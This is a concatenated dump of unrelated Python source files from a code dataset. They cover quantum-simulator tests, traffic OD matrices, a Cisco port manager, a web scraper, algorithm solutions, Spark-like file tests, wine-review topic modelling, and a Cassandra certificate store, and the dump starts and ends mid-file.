3]][[0, 2, 1, 3]]\r\n\r\n return (S @ np.array([a.real, a.imag, 0, 0])*np.sqrt(2*hbar))[0]\r\n\r\n if g == 'GaussianState':\r\n p = [np.array([0.432, 0.123, 0.342, 0.123]), np.diag([0.5234]*4)]\r\n elif g == 'Interferometer':\r\n p = [np.array(U)]\r\n else:\r\n p = [0.432423, -0.12312, 0.324, 0.763][:op.num_params]\r\n\r\n self.assertAllEqual(circuit(*p), reference(*p))\r\n\r\n\r\nif __name__ == '__main__':\r\n print('Testing PennyLane version ' + qml.version() + ', default.gaussian plugin.')\r\n # run the tests in this file\r\n suite = unittest.TestSuite()\r\n for t in (TestAuxillaryFunctions,\r\n 
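# test_nonzero_shots above leans on averaging: each finite-shot evaluation is
# a noisy estimate whose standard error shrinks like sigma/sqrt(N). A
# numpy-only illustration of why delta=0.01 is comfortable for 100 runs (the
# noise scale below is invented; the real spread depends on device and shots):
import numpy as np

rng = np.random.default_rng(0)
true_mean = 0.543 * np.sqrt(2 * 2)            # p * sqrt(2*hbar) with hbar = 2

samples = true_mean + rng.normal(scale=0.02, size=100)
# standard error ~ 0.02 / sqrt(100) = 0.002, well inside delta=0.01
assert abs(samples.mean() - true_mean) < 0.01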
TestGates,\r\n              TestStates,\r\n              TestDefaultGaussianDevice,\r\n              TestDefaultGaussianIntegration):\r\n        ttt = unittest.TestLoader().loadTestsFromTestCase(t)\r\n        suite.addTests(ttt)\r\n    unittest.TextTestRunner().run(suite)\r\n","sub_path":"tests/test_default_gaussian.py","file_name":"test_default_gaussian.py","file_ext":"py","file_size_in_byte":26165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"63861039","text":"# New OD MATRIX\r\n# this script requires a Network_v4.json file, which is created automatically when the network3 script is run to build the network\r\nimport json\r\nimport os\r\n\r\n# raw string so the backslashes in the Windows path stay literal\r\nfilename = os.path.join(r'D:\jcdoig\gridlock', 'Network_v4.json')\r\n\r\njson_data = open(filename)\r\ninter = json.load(json_data)\r\njson_data.close()\r\n\r\n\r\ndef NewGKODMatrix(GKCentroidConfiguration, name = \"New OD Matrix with internal and external\"):\r\n\tGKODMatrix = GKSystem.getSystem().newObject( \"GKODMatrix\", model )\r\n\tGKODMatrix.setName( name )\r\n\tGKODMatrix.setCentroidConfiguration(GKCentroidConfiguration)\r\n\treturn GKODMatrix\r\n\r\nnewODMatrix = NewGKODMatrix(target)\r\nnewODMatrix.setEnableStore(True)\r\ntarget.addODMatrix(newODMatrix)\r\n\r\nrownum = len(inter) - 2\r\ncolnum = len(inter[0]) - 2\r\nitrips = 10\r\n\r\nfor ro in range(0, rownum + 2 ):\r\n\tfor co in range(0, colnum + 2 ):\r\n\t\tfor rd in range(0, rownum + 2 ):\r\n\t\t\tfor cd in range(0, colnum + 2 ):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tif (inter[ro][co][\"internal?\"] and inter[ro][co][\"O/D\"]):\r\n\t\t\t\t\t\tif (inter[rd][cd][\"internal?\"] and inter[rd][cd][\"O/D\"]):\r\n\t\t\t\t\t\t\tif (inter[ro][co][\"GKCentroid\"] != inter[rd][cd][\"GKCentroid\"]):\r\n\t\t\t\t\t\t\t\tnewODMatrix.setTrips(model.getCatalog().find(inter[ro][co][\"GKCentroid\"]), model.getCatalog().find(inter[rd][cd][\"GKCentroid\"]), itrips)\r\n\t\t\t\texcept:\r\n\t\t\t\t\t# some grid cells lack the expected keys; skip them\r\n\t\t\t\t\tpass","sub_path":"create_new_od.py","file_name":"create_new_od.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"236101642","text":"#!/bin/env python\nfrom modules.portstate import *\nfrom modules.host import *\nfrom modules.dbinit import *\nfrom modules.datevalidator import *\nfrom modules.logger import *\nimport argparse\nimport os  # used by get_host_list() below\n\ndef run(*args, **kwargs):\n    arguments = args[0]\n    action = arguments['action']\n\n    if not arguments['ignore_holiday']:\n        if DateValidator.is_holiday() or DateValidator.is_weekend():\n            Logger.log(\"Today is weekend or holiday. Do nothing.\")\n            return None\n\n    if arguments['init']:\n        init(arguments['hosts'])\n        return None\n\n    if arguments['hosts']:\n        hosts = arguments['hosts']\n    else:\n        hosts = get_host_list()\n\n    # Run main procedure\n    for hostname in hosts:\n        host = Host(hostname)\n\n        if arguments['ports']: # if ports explicitly set - use them. 
Here ports can be either list or int\n            ports = arguments['ports']\n        else:\n            host_db = DatabaseInit()\n            host_info = host_db.collect_data_from_host(host)\n            ports_number = host_info['ports_no'] # get ports number from hardware\n            ports = ports_generator(ports_number)\n\n        port_switcher(host, ports, action)\n\ndef init(hostnames):\n    host_db = DatabaseInit(hostnames)\n    host_db.initiate_db()\n    return None\n\ndef ports_generator(ports):\n    \"\"\" Takes Int as input, returns the list [1..ports] \"\"\"\n\n    return [port for port in range(1, ports + 1)]\n\ndef port_switcher(host, ports, action=None):\n    for port in ports:\n        portmanager = PortState(host, port, force=action) # Up, Down\n        portmanager.switch()\n\ndef get_host_list():\n    \"\"\" Return clean hostnames \"\"\"\n\n    db_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), \"db\", \"network\"))\n    db_files = [ x[:6] for x in os.listdir(db_path) if \"L00\" in x ] # get clean hostnames\n    return db_files\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-n','--hosts', nargs=\"*\", dest=\"hosts\", help=\"Set hostnames: [HOST] [HOST] ... \")\n    parser.add_argument('-p','--ports', nargs=\"*\", dest=\"ports\", help=\"Set ports: [PORT] [PORT] ... \")\n    parser.add_argument('-a','--action', dest=\"action\", help=\"Set action [Up/Down]\")\n    parser.add_argument('-i','--init', action=\"store_true\", dest=\"init\", help=\"Initialise database L00XXX.json\")\n    parser.add_argument('--ignore-holiday', action=\"store_true\", dest=\"ignore_holiday\", help=\"Run regardless of the holiday or weekend.\")\n\n    args = parser.parse_args()\n    parameters = vars(args)\n    #print(parameters)\n\n    run(parameters)\n","sub_path":"cisco_port_manager.py","file_name":"cisco_port_manager.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"477486956","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n#  untitled.py\n#  \n#  Copyright 2013 Martin \n#  \n#  This program is free software; you can redistribute it and/or modify\n#  it under the terms of the GNU General Public License as published by\n#  the Free Software Foundation; either version 2 of the License, or\n#  (at your option) any later version.\n#  \n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  
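# Returning to the port manager above: run() takes the argparse result as a
# plain dict, and ports_generator() expands a port count into 1..N. A
# hypothetical invocation sketch (the hostname and values are made up, and the
# call itself is commented out because it needs the repo's modules.* package):
params = {
    'hosts': ['L00123'],        # invented hostname
    'ports': None,              # let the script read the count from hardware
    'action': 'Down',
    'init': False,
    'ignore_holiday': True,
}
# run(params)

def ports_generator(ports):     # same helper as above, shown standalone
    return [port for port in range(1, ports + 1)]

assert ports_generator(3) == [1, 2, 3]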
See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\nimport urllib2\nfrom bs4 import BeautifulSoup\nimport re\n\n#def fix_style(seed):\n#\tstring = ''\n#\tfor i in seed:\n#\t\tstring.append(str(i).strip('[]'))\n#\t\t\n#\treturn string\n\t\t\n\npage = urllib2.urlopen('http://stats.swehockey.se/ScheduleAndResults/Live/3005').read()\nsoup = BeautifulSoup(page)\nsoup.prettify()\n\ngames = soup.find_all(\"b\")\nmatches = soup.b.get_text()\n\n\nresult = []\nfor text in games:\n\tgame = text, str(text.find_next(\"a\").string)\n\tresult.append(game)\n\nfor i in result:\n\tfor p in i:\n\t\tprint(p)\n\t\n#fixed = fix_style(result)\n\nprint(result)","sub_path":"result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"648125293","text":"# https://leetcode.com/problems/reorder-list/\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify head in-place instead.\n \"\"\"\n if not (head and head.next):\n return\n slow = head\n fast = head.next\n ln = 1\n while fast.next and fast.next.next:\n slow = slow.next\n fast = fast.next.next\n ln += 1\n if not fast.next:\n ln = 2*ln\n else:\n slow = slow.next\n ln = 2*ln + 1\n if ln == 2:\n return\n # now slow is as mid of the list\n half2 = slow.next\n slow.next = None\n # reverse the second half\n if half2.next:\n temp1 = half2.next\n half2.next = None\n while temp1 and temp1.next:\n temp2 = temp1.next\n temp1.next = half2\n half2 = temp1\n temp1 = temp2\n temp1.next = half2\n half2 = temp1\n # merge the two lists\n temp1 = head\n temp2 = half2\n while temp1 and temp2:\n half2 = half2.next\n temp2.next = temp1.next\n temp1.next = temp2\n temp1 = temp2.next\n temp2 = half2\n \n","sub_path":"Algo/python/ReorderList.py","file_name":"ReorderList.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"203341021","text":"import os\nimport logging\nimport tempfile\nfrom pysparkling import Context\n\n\ndef test_local_textFile_1():\n lines = Context().textFile('tests/*textFil*.py').collect()\n print(lines)\n assert 'from pysparkling import Context' in lines\n\n\ndef test_local_textFile_2():\n line_count = Context().textFile('tests/*.py').count()\n print(line_count)\n assert line_count > 90\n\n\ndef test_local_textFile_name():\n name = Context().textFile('tests/*.py').name()\n print(name)\n assert name == 'tests/*.py'\n\n\ndef test_s3_textFile():\n if not os.getenv('AWS_ACCESS_KEY_ID'):\n return\n\n myrdd = Context().textFile(\n 's3n://aws-publicdatasets/common-crawl/crawl-data/'\n 'CC-MAIN-2015-11/warc.paths.*'\n )\n assert (\n 'common-crawl/crawl-data/CC-MAIN-2015-11/segments/1424937481488.49/'\n 'warc/CC-MAIN-20150226075801-00329-ip-10-28-5-156.ec2.'\n 'internal.warc.gz' in myrdd.collect()\n )\n\n\ndef test_http_textFile():\n myrdd = Context().textFile(\n 'https://s3-us-west-2.amazonaws.com/human-microbiome-project/DEMO/'\n 'HM16STR/46333/by_subject/1139.fsa'\n )\n assert u'TGCTGCGGTGAATGCGTTCCCGGGTCT' in 
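# The ReorderList solution above is easier to see without the ListNode
# plumbing: find the midpoint, reverse the back half, interleave. A list-based
# sketch of the same idea (toy data, not the LeetCode linked-list API):
def reorder(values):
    mid = (len(values) + 1) // 2
    head, tail = values[:mid], values[mid:][::-1]
    return [head[i // 2] if i % 2 == 0 else tail[i // 2]
            for i in range(len(values))]

assert reorder([1, 2, 3, 4, 5]) == [1, 5, 2, 4, 3]
assert reorder([1, 2, 3, 4]) == [1, 4, 2, 3]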
myrdd.collect()\n\n\ndef test_saveAsTextFile():\n tempFile = tempfile.NamedTemporaryFile(delete=True)\n tempFile.close()\n Context().parallelize(range(10)).saveAsTextFile(tempFile.name)\n with open(tempFile.name+'/part-00000', 'r') as f:\n r = f.readlines()\n print(r)\n assert '5\\n' in r\n\n\ndef test_saveAsTextFile_gz():\n tempFile = tempfile.NamedTemporaryFile(delete=True)\n tempFile.close()\n Context().parallelize(range(10)).saveAsTextFile(tempFile.name+'.gz')\n read_rdd = Context().textFile(tempFile.name+'.gz')\n assert '5' in read_rdd.collect()\n\n\ndef test_saveAsTextFile_bz2():\n tempFile = tempfile.NamedTemporaryFile(delete=True)\n tempFile.close()\n Context().parallelize(range(10)).saveAsTextFile(tempFile.name+'.bz2')\n read_rdd = Context().textFile(tempFile.name+'.bz2')\n assert '5' in read_rdd.collect()\n\n\ndef test_pyspark_compatibility_txt():\n kv = Context().textFile('tests/pyspark/key_value.txt').collect()\n print(kv)\n assert u\"('a', 1)\" in kv and u\"('b', 2)\" in kv and len(kv) == 2\n\n\ndef test_pyspark_compatibility_bz2():\n kv = Context().textFile('tests/pyspark/key_value.txt.bz2').collect()\n print(kv)\n assert u\"a\\t1\" in kv and u\"b\\t2\" in kv and len(kv) == 2\n\n\ndef test_pyspark_compatibility_gz():\n kv = Context().textFile('tests/pyspark/key_value.txt.gz').collect()\n print(kv)\n assert u\"a\\t1\" in kv and u\"b\\t2\" in kv and len(kv) == 2\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n # test_saveAsTextFile()\n # test_local_textFile_2()\n # test_saveAsTextFile_gz()\n # test_s3_textFile()\n test_http_textFile()\n # test_pyspark_compatibility_txt()\n # test_pyspark_compatibility_gz()\n # test_pyspark_compatibility_bz2()\n","sub_path":"tests/test_textFile.py","file_name":"test_textFile.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"221175917","text":"\"\"\"\r\nAuthor: Chris Berardi\r\nSolution to STAT656 Week 10 Assigment, Spring 2017\r\nBasic Text Clustering\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport string\r\nimport nltk\r\nimport numpy as np\r\nfrom nltk import pos_tag\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem.snowball import SnowballStemmer\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.corpus import wordnet as wn\r\nfrom nltk.corpus import stopwords\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\n#for regression\r\nfrom Class_replace_impute_encode import ReplaceImputeEncode\r\nfrom Class_regression import linreg\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# my_analyzer replaces both the preprocessor and tokenizer\r\n# it also replaces stop word removal and ngram constructions\r\n\r\ndef my_analyzer(s):\r\n # Synonym List\r\n syns = {'veh': 'vehicle', 'car': 'vehicle', 'chev':'cheverolet', \\\r\n 'chevy':'cheverolet', 'air bag': 'airbag', \\\r\n 'seat belt':'seatbelt', \"n't\":'not', 'to30':'to 30', \\\r\n 'wont':'would not', 'cant':'can not', 'cannot':'can not', \\\r\n 'couldnt':'could not', 'shouldnt':'should not', \\\r\n 'wouldnt':'would not', }\r\n \r\n # Preprocess String s\r\n s = s.lower()\r\n s = s.replace(',', '. 
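# The synonym table at the top of my_analyzer above is a plain dict lookup
# applied token by token; dict.get makes the mapping loop a one-liner. A tiny
# standalone sketch (tokens invented, synonym entries taken from the table):
syns = {'veh': 'vehicle', 'car': 'vehicle', "n't": 'not'}
tokens = ['the', 'car', 'did', "n't", 'start']

normalized = [syns.get(tok, tok) for tok in tokens]
assert normalized == ['the', 'vehicle', 'did', 'not', 'start']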
')\r\n    # Tokenize \r\n    tokens = word_tokenize(s)\r\n    tokens = [word.replace(',','') for word in tokens ]\r\n    tokens = [word for word in tokens if ('*' not in word) and \\\r\n              (\"''\" != word) and (\"``\" != word) and \\\r\n              (word!='description') and (word !='dtype') \\\r\n              and (word != 'object') and (word!=\"'s\")]\r\n    \r\n    # Map synonyms\r\n    for i in range(len(tokens)):\r\n        if tokens[i] in syns:\r\n            tokens[i] = syns[tokens[i]]\r\n    \r\n    # Remove stop words\r\n    punctuation = list(string.punctuation)+['..', '...']\r\n    pronouns = ['i', 'he', 'she', 'it', 'him', 'they', 'we', 'us', 'them']\r\n    stop = stopwords.words('english') + punctuation + pronouns\r\n    filtered_terms = [word for word in tokens if (word not in stop) and \\\r\n                  (len(word)>1) and (not word.replace('.','',1).isnumeric()) \\\r\n                  and (not word.replace(\"'\",'',2).isnumeric())]\r\n    \r\n    # Lemmatization & Stemming - Stemming with WordNet POS\r\n    # Since lemmatization requires POS, set the POS first\r\n    tagged_words = pos_tag(filtered_terms, lang='eng')\r\n    # Stemming for terms without a WordNet POS\r\n    stemmer = SnowballStemmer(\"english\")\r\n    wn_tags = {'N':wn.NOUN, 'J':wn.ADJ, 'V':wn.VERB, 'R':wn.ADV}\r\n    wnl = WordNetLemmatizer()\r\n    stemmed_tokens = []\r\n    for tagged_token in tagged_words:\r\n        term = tagged_token[0]\r\n        pos = tagged_token[1]\r\n        pos = pos[0]\r\n        try:\r\n            pos = wn_tags[pos]\r\n            stemmed_tokens.append(wnl.lemmatize(term, pos=pos))\r\n        except KeyError:\r\n            # tag has no WordNet counterpart; fall back to the stemmer\r\n            stemmed_tokens.append(stemmer.stem(term))\r\n    return stemmed_tokens\r\n\r\n# Further Customization of Stopping and Stemming using NLTK\r\ndef my_preprocessor(s):\r\n    # Vectorizer sends one string at a time\r\n    s = s.lower()\r\n    s = s.replace(',', '. ')\r\n    print(\"preprocessor\")\r\n    return s\r\n    \r\ndef my_tokenizer(s):\r\n    # Tokenize\r\n    print(\"Tokenizer\")\r\n    tokens = word_tokenize(s)\r\n    tokens = [word.replace(',','') for word in tokens ]\r\n    tokens = [word for word in tokens if ('*' not in word) and \\\r\n              word != \"''\" and word !=\"``\" and word!='description' \\\r\n              and word !='dtype']\r\n    return tokens\r\n\r\n# Increase Pandas column width to let pandas read large text columns\r\npd.set_option('max_colwidth', 32000)\r\n# California Cabernet Reviews\r\nfile_path = 'C:/Users/Saistout/Desktop/656 Applied Analytics/Python/Week 10 Assignment/'\r\ndf = pd.read_excel(file_path+\"CaliforniaCabernet.xlsx\")\r\n\r\n# Setup simple constants\r\nn_docs = len(df['description'])\r\nn_samples = n_docs\r\nm_features = None\r\ns_words = 'english'\r\nngram = (1,2)\r\n\r\n# Setup reviews in list 'discussions'\r\ndiscussions = []\r\nfor i in range(n_samples):\r\n    discussions.append((\"%s\" %df['description'].iloc[i]))\r\n    \r\n    \r\n# Create Word Frequency by Review Matrix using Custom Analyzer\r\ncv = CountVectorizer(max_df=0.95, min_df=2, max_features=m_features,\\\r\n                     analyzer=my_analyzer, ngram_range=ngram)\r\ntf = cv.fit_transform(discussions)\r\n\r\nprint(\"\\nVectorizer Parameters\\n\", cv, \"\\n\")\r\n\r\n\r\n# LDA For Term Frequency x Doc Matrix\r\nn_topics = 9\r\nmax_iter = 5\r\nlearning_offset = 20.\r\nlearning_method = 'online'\r\n# LDA for TF-IDF x Doc Matrix\r\n# First Create Term-Frequency/Inverse Doc Frequency by Review Matrix\r\n# This requires constructing Term Freq. x Doc. 
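# Distilled sketch of the pipeline this script assembles: documents -> TF-IDF
# matrix -> LDA -> top words per topic. Toy corpus and simplified settings;
# get_feature_names() matches the older scikit-learn API used throughout this
# script (newer releases rename it get_feature_names_out):
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.decomposition import LatentDirichletAllocation

docs = ['ripe cherry and oak', 'oak tannin and cherry', 'crisp apple cider']
vect = TfidfVectorizer()
X = vect.fit_transform(docs)

lda = LatentDirichletAllocation(n_components=2, random_state=12345)
lda.fit(X)

terms = vect.get_feature_names()
for k, topic in enumerate(lda.components_):
    print('Topic #%d:' % k, ' '.join(terms[i] for i in topic.argsort()[:-4:-1]))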
matrix first\r\ntf_idf = TfidfTransformer()\r\nprint(\"\\nTF-IDF Parameters\\n\", tf_idf.get_params(),\"\\n\")\r\ntf_idf = tf_idf.fit_transform(tf)\r\n# Or you can construct the TF/IDF matrix from the data\r\ntfidf_vect = TfidfVectorizer(max_df=0.95, min_df=2, max_features=m_features,\\\r\n analyzer=my_analyzer, ngram_range=ngram)\r\ntf_idf = tfidf_vect.fit_transform(discussions)\r\nprint(\"\\nTF_IDF Vectorizer Parameters\\n\", tfidf_vect, \"\\n\")\r\n\r\nlda = LatentDirichletAllocation(n_components=n_topics, max_iter=max_iter,\\\r\n learning_method=learning_method, \\\r\n learning_offset=learning_offset, \\\r\n random_state=12345)\r\nlda.fit_transform(tf_idf)\r\nprint('{:.<22s}{:>6d}'.format(\"Number of Reviews\", tf.shape[0]))\r\nprint('{:.<22s}{:>6d}'.format(\"Number of Terms\", tf.shape[1]))\r\nprint(\"\\nTopics Identified using LDA with TF_IDF\")\r\ntf_features = cv.get_feature_names()\r\nmax_words = 15\r\ndesc = []\r\nfor topic_idx, topic in enumerate(lda.components_):\r\n message = \"Topic #%d: \" % topic_idx\r\n message += \" \".join([tf_features[i]\r\n for i in topic.argsort()[:-max_words - 1:-1]])\r\n print(message)\r\n print()\r\n desc.append([tf_features[i] for i in topic.argsort()[:-max_words - 1:-1]])\r\n \r\n#Extract which topic each review belongs to\r\ntopics = pd.DataFrame(lda.fit_transform(tf_idf))\r\nclusters = pd.DataFrame(topics.idxmax(axis=1))\r\ncol=['year','points','Region','price']\r\nclus = pd.concat([clusters,df[col]], axis=1, ignore_index=True)\r\n#rename the columns\r\nclus.columns = [\"Cluster\",\"Year\",\"Score\",\"Region\",\"Price\"]\r\n\r\n#Create a table of the average points and price per cluster, include the 15\r\n#word descriptions in the table\r\nprice = []\r\nscore = []\r\ncluster = []\r\nmean_table=pd.DataFrame()\r\nfor i in range(0,9):\r\n this_clust = clus[clus['Cluster']==i]\r\n this_price = this_clust['Price'].mean()\r\n this_score = this_clust['Score'].mean()\r\n price.append(this_price)\r\n score.append(this_score)\r\n cluster.append(i)\r\nmean_table['Cluster']=cluster\r\nmean_table['Score']=score\r\nmean_table['Price']=price\r\nmean_table['Description']=desc\r\nmean_table\r\n\r\n#Create a table of the percent of reviews in each cluster by wine region\r\np0=[]\r\np1=[]\r\np2=[]\r\np3=[]\r\np4=[]\r\np5=[]\r\np6=[]\r\np7=[]\r\np8=[]\r\nregions=['California Other', 'Central Coast','Central Valley', 'Clear Lake',\\\r\n 'High Valley', 'Lake County','Mendocino County','Mendocino Ridge',\\\r\n 'Mendocino/Lake Counties', 'Napa','Napa-Sonoma','North Coast',\\\r\n 'Red Hills Lake County','Redwood Valley','Sierra Foothills','Sonoma',\\\r\n 'South Coast']\r\npRegion=pd.DataFrame()\r\nfor name in regions:\r\n this_region = clus[clus['Region']==name]\r\n n=[]\r\n total=0\r\n for i in range(0,9):\r\n this_clus=this_region[this_region['Cluster']==i]\r\n n.append(this_clus.shape[0])\r\n total=sum(n)\r\n p0.append(n[0]/total)\r\n p1.append(n[1]/total)\r\n p2.append(n[2]/total)\r\n p3.append(n[3]/total)\r\n p4.append(n[4]/total)\r\n p5.append(n[5]/total)\r\n p6.append(n[6]/total)\r\n p7.append(n[7]/total)\r\n p8.append(n[8]/total)\r\npRegion['Region']=regions\r\npRegion['P0']=p0\r\npRegion['P1']=p1\r\npRegion['P2']=p2\r\npRegion['P3']=p3\r\npRegion['P4']=p4\r\npRegion['P5']=p5\r\npRegion['P6']=p6\r\npRegion['P7']=p7\r\npRegion['P8']=p8\r\n\r\n#Fit a linear regression model to model wine price use a 70/30 train test split\r\n#Since the regularization parameter C only exists for logistic regression\r\nattribute_map_clus = {\r\n 'Score' :[0,(80,100),[0,0]],\r\n 
'Year' :[0,(1985,2016),[0,0]],\r\n 'Region' :[2,('California Other', 'Central Coast','Central Valley', \\\r\n 'Clear Lake','High Valley', 'Lake County',\\\r\n 'Mendocino County','Mendocino Ridge',\\\r\n 'Mendocino/Lake Counties', 'Napa','Napa-Sonoma',\\\r\n 'North Coast','Red Hills Lake County','Redwood Valley',\\\r\n 'Sierra Foothills','Sonoma','South Coast'),[0,0]],\r\n 'Cluster' :[2,(0,1,2,3,4,5,6,7,8),[0,0]],\r\n 'Price' :[0,(0,625),[0,0]]\r\n}\r\nvarlist = ['Price']\r\n\r\nrie_clus = ReplaceImputeEncode(data_map=attribute_map_clus, \\\r\n nominal_encoding='one-hot', \r\n interval_scale = None, drop=True, display=False)\r\nencoded_df_clus = rie_clus.fit_transform(clus)\r\n\r\nX_clus = encoded_df_clus.drop(varlist, axis=1)\r\ny_clus = encoded_df_clus[varlist]\r\nX_train, X_valid, y_train, y_valid= \\\r\ntrain_test_split(X_clus,y_clus,test_size = 0.3, random_state=7)\r\n\r\nnp_y_train = np.ravel(y_train)\r\nnp_y_valid = np.ravel(y_valid)\r\n\r\n\r\nreg = LinearRegression()\r\nreg.fit(X_train,np_y_train)\r\n\r\nlinreg.display_coef(reg,X_train,y_train,X_train.columns)\r\nlinreg.display_split_metrics(reg,X_train,y_train,X_valid,y_valid)","sub_path":"week 10.py","file_name":"week 10.py","file_ext":"py","file_size_in_byte":9778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217401870","text":"def solve(A):\n count=0\n for i in range(len(A)):\n if A[i]&1==1 and A[i]>1 and A[i]!=2:\n j=3\n isPrime=True\n while(j*j<=A[i]):\n if A[i]%j==0:\n isPrime=False\n break\n else:\n j+=1\n if isPrime==True:\n #print(A[i])\n count+=1\n elif A[i] in [2,3,5,7]:\n count+=1\n return count\n \n \ndef main():\n A=list(map(int,input().split()))\n n=solve(A)\n print(n)\n\nif __name__ == '__main__':\n main()\n","sub_path":"primeCount.py","file_name":"primeCount.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"95213073","text":"# Copyright (c) 2016 Rackspace, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\n\nfrom cassandra import query\nfrom oslo_log import log\nfrom six.moves import filterfalse\n\nfrom poppy.model import ssl_certificate\nfrom poppy.storage import base\n\n\nLOG = log.getLogger(__name__)\n\nCQL_CREATE_CERT = '''\n INSERT INTO certificate_info (project_id,\n flavor_id,\n cert_type,\n domain_name,\n cert_details\n )\n VALUES (%(project_id)s,\n %(flavor_id)s,\n %(cert_type)s,\n %(domain_name)s,\n %(cert_details)s)\n'''\n\nCQL_SEARCH_CERT_BY_DOMAIN = '''\n SELECT project_id,\n flavor_id,\n cert_type,\n domain_name,\n cert_details\n FROM certificate_info\n WHERE domain_name = %(domain_name)s\n'''\n\nCQL_GET_CERTS_BY_STATUS = '''\n SELECT domain_name\n FROM cert_status WHERE status = %(status)s\n'''\n\nCQL_DELETE_CERT = '''\n DELETE FROM certificate_info\n WHERE domain_name = %(domain_name)s\n'''\n\nCQL_DELETE_CERT_STATUS = '''\n DELETE FROM cert_status\n WHERE domain_name = %(domain_name)s\n'''\n\n\nCQL_INSERT_CERT_STATUS = 
'''\n INSERT INTO cert_status (domain_name,\n status\n )\n VALUES (%(domain_name)s,\n %(status)s)\n'''\n\nCQL_UPDATE_CERT_DETAILS = '''\n UPDATE certificate_info\n set cert_details = %(cert_details)s\n WHERE domain_name = %(domain_name)s\n IF cert_type = %(cert_type)s AND flavor_id = %(flavor_id)s\n'''\n\n\nclass CertificatesController(base.CertificatesController):\n\n \"\"\"Certificates Controller.\"\"\"\n\n @property\n def session(self):\n \"\"\"Get session.\n\n :returns session\n \"\"\"\n return self._driver.database\n\n def create_certificate(self, project_id, cert_obj):\n if self.cert_already_exist(domain_name=cert_obj.domain_name,\n comparing_cert_type=cert_obj.cert_type,\n comparing_flavor_id=cert_obj.flavor_id,\n comparing_project_id=project_id):\n raise ValueError('Certificate already exists '\n 'for {0} '.format(cert_obj.domain_name))\n\n args = {\n 'project_id': project_id,\n 'flavor_id': cert_obj.flavor_id,\n 'cert_type': cert_obj.cert_type,\n 'domain_name': cert_obj.domain_name,\n # when create the cert, cert domain has not been assigned yet\n # In future we can tweak the logic to assign cert_domain\n # 'cert_domain': '',\n 'cert_details': cert_obj.cert_details\n }\n stmt = query.SimpleStatement(\n CQL_CREATE_CERT,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, args)\n\n cert_status = None\n try:\n provider_status = json.loads(\n list(cert_obj.cert_details.values())[0]\n )\n cert_status = provider_status['extra_info']['status']\n except (IndexError, KeyError, ValueError) as e:\n LOG.warning(\n \"Create certificate missing extra info \"\n \"status {0}: Error {1}. \"\n \"Using 'create_in_progress' instead. \".format(\n cert_obj.cert_details, e))\n cert_status = 'create_in_progress'\n finally:\n # insert/update for cassandra\n self.insert_cert_status(cert_obj.domain_name, cert_status)\n\n def delete_certificate(self, project_id, domain_name, cert_type):\n args = {\n 'domain_name': domain_name.lower()\n }\n\n stmt = query.SimpleStatement(\n CQL_SEARCH_CERT_BY_DOMAIN,\n consistency_level=self._driver.consistency_level)\n result_set = self.session.execute(stmt, args)\n complete_results = list(result_set)\n if complete_results:\n for r in complete_results:\n r_project_id = str(r.get('project_id'))\n r_cert_type = str(r.get('cert_type'))\n if r_project_id == str(project_id) and \\\n r_cert_type == str(cert_type):\n args = {\n 'domain_name': str(r.get('domain_name'))\n }\n stmt = query.SimpleStatement(\n CQL_DELETE_CERT,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, args)\n stmt = query.SimpleStatement(\n CQL_DELETE_CERT_STATUS,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, args)\n else:\n raise ValueError(\n \"No certificate found for: {0},\"\n \"type: {1}\".format(domain_name, cert_type))\n\n def update_certificate(self, domain_name, cert_type, flavor_id,\n cert_details):\n\n args = {\n 'domain_name': domain_name,\n 'cert_type': cert_type,\n 'flavor_id': flavor_id,\n 'cert_details': 